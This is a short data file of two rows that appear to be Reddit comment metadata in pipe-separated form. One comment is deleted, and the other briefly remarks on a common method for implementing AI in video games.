True | [deleted] | null | [deleted] | null | 0 | 1314947062 | False | 0 | c2gyh9g | t3_k1zew | null | t1_c2gyh9g | t1_c2gx5ub | null | 1427549508 | 1 | t5_2fwo | null | null | null |
True | Antidote | null | Pretty much the primary method for implementing AI even in modern games. | null | 0 | 1314947449 | False | 0 | c2gyi8e | t3_k12ka | null | t1_c2gyi8e | t1_c2gqk7m | null | 1427549520 | 13 | t5_2fwo | null | null | null |
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